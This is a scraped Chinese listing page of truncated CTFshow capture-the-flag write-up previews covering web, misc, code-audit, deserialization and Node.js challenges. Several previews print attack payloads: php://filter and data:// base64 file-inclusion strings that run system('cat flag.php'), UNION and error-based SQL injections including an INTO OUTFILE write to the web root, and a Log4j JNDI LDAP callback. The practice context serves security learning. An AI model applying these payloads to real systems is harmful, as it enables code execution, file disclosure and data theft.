E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTFSHOW
ctfshow
web入门(2)
web11打开这个网站,到网站诊断分析模块搜索域名web12提示有时候网站上的公开信息,就是管理员常用密码打开,就是个购物网站因为昨天刚做robots.txt我就搜了一下真的有,提示admin这个页面访问一下,username肯定是admin,但是密码。有点晕。但是看到提示我就又去看了看原来的页面,有没有可疑的密码在末尾看到这串数字,试一下8ok成功了web13提示:技术文档里面不要出现敏感信息,
木…
·
2023-09-22 13:04
学习
Ctfshow
web入门 代码审计篇 web301-web310 详细题解 全
CTFshow
代码审计web301下载的附件的目录结构如下:开题后界面,看见输入框,感觉是sql。
Jay 17
·
2023-09-22 09:48
CTFSHOW
web入门
wp合集
代码审计
PHP
SQL注入
反序列化
web安全
FastCGI
nginx
CTFShow
愚人杯|非预期解-Web-WriteUp
目录Misc-WriteUpWriteUpeasy_signin被遗忘的反序列化easy_sstieasy_flaskeasy_phpMisc-WriteUpMisc1Misc2WriteUpeasy_signin刚进来是一张滑稽,看到url有一个img参数,好像是base64编码,解码后发现是解码后发现就是文件名,猜测有任意文件下载漏洞打开源代码发现传过来的是文件的base64编码把index.
Iam碳酸氢钠
·
2023-09-21 09:05
php
python
网络安全
web安全
安全
CTFShow
|Web入门-信息收集 1-20题全解
WriteUpweb1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web20总结前言闲来无事,跟朋友借了个号,把
CTFSHOW
Iam碳酸氢钠
·
2023-09-21 09:05
web安全
网络安全
html
php
网络
CTFShow
愚人杯|Misc-WriteUp1
目录链接前言WriteUp11.奇怪的压缩包2.哇库哇库23.琴柳感链接WebMisc2前言每天下午六点定时更新这次
CTFShow
的愚人杯,第一晚勉强上榜了,第二天睡醒还没掉下去,不过第二天打了另一场比赛
Iam碳酸氢钠
·
2023-09-21 09:05
python
开发语言
ctfshow
代码审计篇
文章目录web301-SQL注入web302-sql写shellweb303-insertweb304-报错注入web305-反序列化蚁剑连接数据库web306-反序列化web307-shell_exce()web308-ssrf打mysqlweb309-ssrf打fastcgiweb310-ssrf+fastcfgi写shellweb301-SQL注入check.php$username=$_P
ThnPkm
·
2023-09-21 05:57
刷题
wp
php
数据库
开发语言
ctfshow
-misc入门-31-50
misc31老套路,同misc24,算出bmp像素数再算下宽度改了即可,这里是487202/3/150,最后宽度1082,除不尽没事,应该是后面故意多加了几个字节想了解bmp的可以看看这篇文章https://zhuanlan.zhihu.com/p/260702527也贴一个最普通的爆破bmp宽度的脚本,爆破完得自己手动找(ˉ▽ˉ;)…importstructimportzlibf=open('.
V3geD4g
·
2023-09-19 09:35
wp
python
安全
NSS [HNCTF 2022 Week1]Challenge__rce
NSS[HNCTF2022Week1]Challenge__rcehint:灵感来源于
ctfshow
吃瓜杯Y4大佬的题开题,界面没东西,源码里面有注释,GET传参?
Jay 17
·
2023-09-17 07:52
CTF-web(零散wp合集)
web安全
网络安全
PHP
RCE
自增RCE
命令执行
ctfshow
—溯源—初学乍练
0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关CISP汇总文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目给了一张飞机的图片,然后问目的地0x02WriteUp首先是给了这样一个图片,还是老样子,百度识图一下,在百度识图中,发现一个相似度非常高的图片然后查看一下:发现是一篇报道这个就是它的目的地0x03other欢迎大家关注我朋友的公众号皓月当空w分享漏洞情报以及
Wcbddd
·
2023-09-17 01:53
溯源
CTF
安全
ctfshow
—web—一切看起来都那么合情合理
0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关CISP汇总文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp简单看下,然后扫一下目录,发现一个www.zip看一下源码发现两个要点:来看第一个地方:ini_set('session.serialize_handler','php');这个地方会反序列化session的内容然后来看第二个地方:fil
Wcbddd
·
2023-09-17 01:52
CTF
web
安全
CTFshow
-web入门-命令执行(持续更新中)
CTFshow
-web入门-命令执行web29web30web31web32web33-36web37-38web39web40web41web29分析题目代码:${IFS}$IFS$9{cat,fl}
XXX_WXY
·
2023-09-16 22:30
信息安全
安全
web安全
python
php
信息安全
ctfshow
-web-红包题 辟邪剑谱
0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp这道题主要是考察mysql查询绕过的问题。首先访问后看到是一个登录页面,测试注册等无果扫描目录,发现www.zip,下载看一下:发现这里注册接口处,user防护了,但是password没有防护,再看看登录逻辑,可以看到这里是以admin作为关键字搜索
Wcbddd
·
2023-09-15 10:25
CTF
web
安全
ctfshow
web入门(1)
web1查看页面源代码web2ctr+uweb3因为查看源码没有东西,网络查看下数据包,找到flagweb4robots协议其他都没啥信息,就看下robots.txt,这个文件可能会泄露部分网站目录访问下,看到了web5phps泄露也没啥信息,在响应头里面看到了X-Powered-By:PHP/7.3.11得知-网站是用php语言编写的phps文件就是php的源代码文件,通常用于提供给用户(访问者
木…
·
2023-09-15 02:20
学习
ctfshow
-web-红包题第九弹
0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp首先看到的是一个登录框,登录一下,发现一个疑似SSRF的地方。使用百度进行测试,确认是ssrf这里是php可以直接使用Gopher协议+mysql写文件,题目给了提示3306这里的poc使用工具:https://github.com/tarunkan
Wcbddd
·
2023-09-14 04:46
CTF
web
安全
ctfshow
-web-红包题 葵花宝典
0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp这道题说实话比较奇怪,有一个注册接口,先注册一个账号在,我注册的是admins123456然后登录一下原本以为是假的,结果登录了一下,发现是对的。没有任何难度0x03other欢迎大家关注我朋友的公众号皓月当空w分享漏洞情报以及各种学习资源,技能树,
Wcbddd
·
2023-09-14 04:46
CTF
web
安全
CTF_
ctfshow
_登录就有flag
打开靶机是一个登录界面,试了一下普通的sql注入,1'or1=1#,不行所以这里用'^0#分号可以用于闭合,井号可以用于注释,^进行异或运算,等号就是判等,这里需要利用sql的一个点“mysql弱类型转换”,空异或0会查到所有非数字开头的记录
鸡肋是鸡肋!
·
2023-09-10 08:34
CTF
sql
安全
web安全
CTF_
ctfshow
_meng新_web1-web24
打开靶机,发现包含有个config.php文件,打开进去没有数据所以直接开始代码审计吧~有个变量为id,参数必须为1000才能获得flag,但id>999直接返回退出了。尝试一下sql注入整形注入:看一下回显点回显点为三版本:10.3.18-MariaDB数据库:web1?id=2unionselect1,2,database()#表:article?id=2unionselect1,2,grou
鸡肋是鸡肋!
·
2023-09-10 08:33
CTF
安全
web安全
CTF_
ctfshow
_web13_文件上传漏洞
打开靶机发现是个文件上传漏洞,上传了图片这些,都提示太大了10344c8d-1054-45ac-ac38-f99ae5d4e476.challenge.ctf.show/upload.php.bak然后upload.php.bak下载下来了源码,进行审计:24){die("errorfilezise");}//文件名字长度9){die("errorfilename");}//文件后缀3){die(
鸡肋是鸡肋!
·
2023-09-10 08:03
CTF
安全
web安全
ctfshow
学习记录-web入门(文件包含78-87)
目录web78web79web80web81web82-86web87这一组题经常半夜搞,不得不说真是太卷了,虽然是被迫的。web78解答:include包含,直接用伪协议就可以。?file=php://filter/convert.base64-encode/resource=flag.phpweb79解答:把php替换了,但是没有过滤大小写。改用Php绕过?file=Php://inputp
九枕
·
2023-09-07 23:53
ctf-web
#
ctfshow-web
学习
php
[
CTFSHOW
]文件包含78-88
web78php伪协议payload:file=php://filter/read=convert.base64-encode/resource=flag.phpweb79data协议,用base64编码绕过过滤payload:file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==web80-81利用日志
huamanggg
·
2023-09-07 23:53
刷题记录
《
CTFshow
-Web入门》09. Web 81~90
Web入门索引web81题解web82题解原理web83题解web84题解web85题解web86题解web87题解原理web88题解web89题解web90题解ctf-web入门索引web81:include()利用,一句话木马之Nginx日志利用。web82~86:include()利用,条件竞争,利用session文件写入一句话木马。web87:file_put_contents()利用,伪
镜坛主
·
2023-09-07 23:52
前端
ctfshow
-web-红包一
0x00前言CTF加解密合集CTFWeb合集网络安全知识库文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp上来就丢了一个站,还有一个不怎么有用的图片。按照常规流程,先扫目录,但是无果(工具已同步更新,位置在工具总结/目录扫描/DirBuster.zip)接着看一下返回值:发现存在一段js,像这种js,我是直接丢到f12控制台执行一下,然后就可以看到flag了,对
Wcbddd
·
2023-09-07 02:56
CTF加密解密
CTF
web安全
ctfshow
反序列化 wp
好的,又开了一个新系列,加油~后面只总结我觉得有必要总结的了,如果有什么问题可以留言问我强烈推荐Y4tacker师傅的文章:[CTF]PHP反序列化总结_Y4tacker的博客-CSDN博客_php反序列化ctf,真的挺全了web255payload:username=xxxxxx&password=xxxxxxweb256-257有一个技巧,反序列化的格式可以直接用php生成,就不用手动输入了例
yink12138
·
2023-09-06 19:00
CTF修炼之路
php
web安全
ctfshow
vip题目限免
源码泄露右键查看源代码即可得到flag前台JS绕过解法一URL前面加上view-source:解法二题目描述说禁用js,那就禁用就行然后和前面一样右键查看就行协议头信息泄露提示抓包,那就抓包吧抓包直接就在返回包获得flag了robots后台泄露robots协议也叫君子协议,告诉爬虫不能爬取的内容,把敏感目录写上去容易被黑客利用phps源码泄露直接在url后面加index.phps会自动下载php源
blackK_YC
·
2023-09-06 19:30
网络安全
安全
Ctfshow
反序列化
目录常见的反序列化魔术手法web254web255web256web257web258web259web260web261web262解法一:解法二:web263web264web265web266web267web268web269web270web271web272web273web274web275常见的反序列化魔术手法__wakeup()//执行unserialize()时,先会调用这个函
安好.791
·
2023-09-06 19:00
php
开发语言
CTFSHOW
反序列化
254isVip;}publicfunctionlogin($u,$p){if($this->username===$u&&$this->password===$p){$this->isVip=true;}return$this->isVip;}publicfunctionvipOneKeyGetFlag(){if($this->isVip){global$flag;echo"yourflagis
v2ish1yan
·
2023-09-06 19:30
CTF
WEB
php
python
ctfshow
反序列化2
web263PHP的session反序列化带你走进PHPsession反序列化漏洞-先知社区原理解释不错
CTFshow
-web入门-反序列化_哔哩哔哩_bilibili可参考
CTFshow
反序列化web263
ThnPkm
·
2023-09-06 19:29
刷题
wp
php
PHP
ctf
安全
web
CTFshow
反序列化
目录
CTFshow
反序列化web262-SoapClient类的利用web263-PHPsession反序列化什么是session?
Sn_u
·
2023-09-06 19:29
php
服务器
开发语言
ctfshow
反序列化
web254error_reporting(0);highlight_file(__FILE__);include('flag.php');classctfShowUser{public$username='xxxxxx';public$password='xxxxxx';public$isVip=false;publicfunctioncheckVip(){return$this->isVip;
Msaerati
·
2023-09-06 19:59
java
服务器
php
ctfshow
反序列化Web254-255
2022/4/17反序列化反序列化漏洞的产生主要有以下两个原因:1.unserialize函数的参数可控。2.存在魔法函数。魔法函数__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debu
墨言ink
·
2023-09-06 19:58
web安全
ctfshow
反序列化255-263
webweb255error_reporting(0);highlight_file(__FILE__);include('flag.php');classctfShowUser{public$username='xxxxxx';public$password='xxxxxx';public$isVip=false;publicfunctioncheckVip(){return$this->isV
1-1A0
·
2023-09-06 19:58
CTF
php
javascript
CTFSHOW
反序列化
反序列化为什么要序列化class类实验室成员obj对象(是一种语言结构,一个对象就是一个变量)某一个成员特征(成员变量)性别,姓名。。。。。。方法(动作)思考,听课,下课。。。。。。百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。简单的说,序列化
ing_end
·
2023-09-06 19:28
笔记
web安全
ctfshow
反序列化篇(下)
web267(yii框架)开启靶机,是一个网站,试着搜索有没有重要信息。在这里发现是yii框架。我们使用弱口令admin/admin就可以登录进来了,那就继续收集重要信息。在源代码中发现了重要注释。让我们传一个view-source参数。出现了传参点,百度搜索yii反序列化漏洞,有相关的poc可以直接打。想知道构造思路可以看这篇文章:yii框架反序列化相关poc为:checkAccess='she
XiLitter
·
2023-09-06 19:28
#
web
安全
php
web安全
ctfshow
—反序列化
简介序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。php将数据序列化和反序列化会用到两个函数serialize将对象格式化成有序的字符串unserialize将字符串还原成原来的对象序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。常见的魔术方法__construct(),类的构造函数__destr
Snakin_ya
·
2023-09-06 19:27
刷题记录
php反序列化
CTFshow
反序列化 web262
目录源码思路题解解法一直接构造类进行序列化解法二字符逃逸总结源码from=$f;$this->msg=$m;$this->to=$t;}}$f=$_GET['f'];$m=$_GET['m'];$t=$_GET['t'];if(isset($f)&&isset($m)&&isset($t)){$msg=newmessage($f,$m,$t);$umsg=str_replace('fuck','l
Kradress
·
2023-09-06 19:57
CTFshow
php
安全
开发语言
[CTF]
CTFSHOW
反序列化
265token=$t;$this->password=$p;}publicfunctionlogin(){return$this->token===$this->password;}}$
ctfshow
Sapphire037
·
2023-09-06 19:57
CTF
php
安全
web安全
ctfshow
反序列化
PHP反序列化前置知识序列化和反序列化对象是不能在字节流中传输的,序列化就是把对象转化为字符串以便存储和传输,反序列化就是将字符串转化为对象魔术方法__construct()//构造,当对象new时调用__wakeup()//执行unserialize()时,先会调用这个函数__sleep()//执行serialize()时,先会调用这个函数__destruct()//对象被销毁时触发__call
blackK_YC
·
2023-09-06 19:56
网络安全
ctfshow
—web—Log4j复现
0x00前言CTF加解密合集CTFWeb合集网络安全知识库0x01题目0x02WriteUp这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。log4j的payload是:${jndi:ldap://}这里选取的工具是:JNDIExploit利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:138
Wcbddd
·
2023-09-05 01:20
web
CTF
log4j
ctfshow
—萌新赛—给她
0x00前言CTF加解密合集CTFWeb合集网络安全知识库文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp首先看到访问页面,正常情况下这种都是sql注入,尝试发现被转义了尝试无果之后,扫描目录,发现git目录使用Git_Extract获取一下源码,发现一个hint文件,打开看一下,发现是通过sprintf进行处理的看到sprintf,要了解一个知识点就是php字
Wcbddd
·
2023-09-05 01:19
CTF
web
web安全
安全
CTFshow
菜狗杯 web方向 全
文章目录菜狗杯web签到菜狗杯web2c0me_t0_s1gn菜狗杯我的眼里只有$菜狗杯抽老婆菜狗杯一言既出菜狗杯驷马难追菜狗杯TapTapTap菜狗杯Webshell菜狗杯化零为整菜狗杯无一幸免菜狗杯无一幸免_FIXED菜狗杯传说之下(雾)菜狗杯算力超群菜狗杯算力升级菜狗杯easyPytHon_P菜狗杯遍地飘零菜狗杯茶歇区菜狗杯小舔田?菜狗杯LSB探姬菜狗杯Is_Not_Obfuscate菜狗杯
Jay 17
·
2023-09-03 17:05
CTF赛事
web安全
网络安全
PHP
python
AES
变量覆盖
沙箱逃逸
CTFshow
nodejs
CTFshowNode.jsCTFshowNode.jsweb334web335web336web337md5绕过web338原型链污染web339原型链污染+web340原型链污染++web341原型链污染+++web342原型链污染++++web343原型链污染+++++web344nodejs特性CTFshowNode.jsNode.js是一个基于ChromeV8引擎的Javascript运
Sn_u
·
2023-09-03 06:39
javascript
原型模式
开发语言
web安全
ctfshow
nodejs
前言文档先阅读一遍Node.js教程|菜鸟教程(runoob.com)常见漏洞Node.js常见漏洞学习与总结-先知社区(aliyun.com)nodejs一些入门特性&&实战-先知社区(aliyun.com)原型链污染深入理解JavaScriptPrototype污染攻击|离别歌(leavesongs.com)模板引擎rceXNUCA2019Hardjs题解从原型链污染到RCE-先知社区(ali
Ff.cheng
·
2023-09-03 06:09
笔记
Ctfshow
nodejs
Ctfshownodejsweb334(特性)web335(特性)web336(特性)web337(特性)web338(原型链污染)web339(原型链污染)web340(原型链污染)web341(ejs)web342(jade)web343(jade)web344(特性)web334(特性)login.jsvarexpress=require('express');varrouter=expre
Elitewa
·
2023-09-03 06:32
web安全
CTF
安全
网络
web安全
node.js
e与phi不互素 --- 五 + 1 + 1道题详记
题目描述:题目分析:题四(2022
ctfshow
卷王杯现代密码签到)题目描述:题目分析:有限域开方求解:AMM算法求解:题五题目描述:有限域开方求解:AMM算法求解:浅记一下持续更新中...题六([第三届江西省网络安全大赛
Emmaaaaaaaaaa
·
2023-09-03 04:34
密码RSA
密码学
安全
ctfshow
- web1(50 point)
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp首先映入眼帘的是登录界面尝试弱口令无果,可以注册,尝试注册一个账号通过url发现这里是通过orderby进行了排序,测试发现一共5个字段,并且3是按照密码进行排序http://47060d53-16c1-4edd-a0df-c2d8f0bb636e.challenge.ctf.show/user_main.php?ord
Wcbddd
·
2023-09-02 05:15
CTF
web
web安全
ctfshow
—萌新—杂项1
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUped400fbcff269bd9c65292a97488168a首先这是一个md5,然后在线解密一下,解密站点https://www.somd5.com/解密出来的内容是helloctf然后去掉ctf就是最终的答案结果就是flag{hello}以上,虽然感觉意义不大,但是还是记录一下。咳咳,大家有空可以关注一下我朋友的公
Wcbddd
·
2023-09-02 05:15
CTF
web
安全
ctfshow
web521 报错注入和分段
发现注入点闭合是’发现没有回显,但是因为有报错所以可以报错注入在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。报错注入的原理,在错误信息中执行SQL语句。触发报错的方式有很多,具体细节也不尽相同。此处建议直接背公式。groupby?id=1"and(select1from(selectcount(*),concat(user(),floor(r
blackK_YC
·
2023-09-01 14:04
数据库
CTFshow
175 into outfile ‘/var/www/html/1.txt‘
[x00-x7f]匹配ASCII值从0-127的字符0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。限制了页面不能显示任何数据,?id=1'unionselect1,passwordfromctfshow_user5intooutfile'/var/www/html/1.txt'--+&page=1&limit=10就跳到这里了,真的很神奇,所以说selectxxxf
王俊凯迷妹
·
2023-08-30 02:10
sql
ctfshow
红包题
前言:最近一直在搞java很少刷题,看见
ctfshow
的活动赶紧来复现一波~
ctfshow
红包挑战7还有佬们给出了这个wp但是没有解释("%0C%08%00%00"^"`{%2f")(""^"`{/")
偶尔躲躲乌云334
·
2023-08-29 07:24
python
前端
php
PHP代码审计 -- 以
ctfshow
php特性 93-104为例
web93(intval()特性)来看源码首先是弱比较(不能等于4476)然后是正则比较不能出现大小写的字母最后就是等于4476;过滤了字母,所以不能用16进制,可以用8进制或者小数绕过/?num=010574或/?num=4476.1web94(intval()特性)来看源码函数分析:strpos()函数返回匹配的字符位置,默认从0开始strpos(string,find,start)strin
0e1G7
·
2023-08-28 04:58
作业
刷题笔记
php
开发语言
安全
经验分享
web安全
上一页
3
4
5
6
7
8
9
10
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他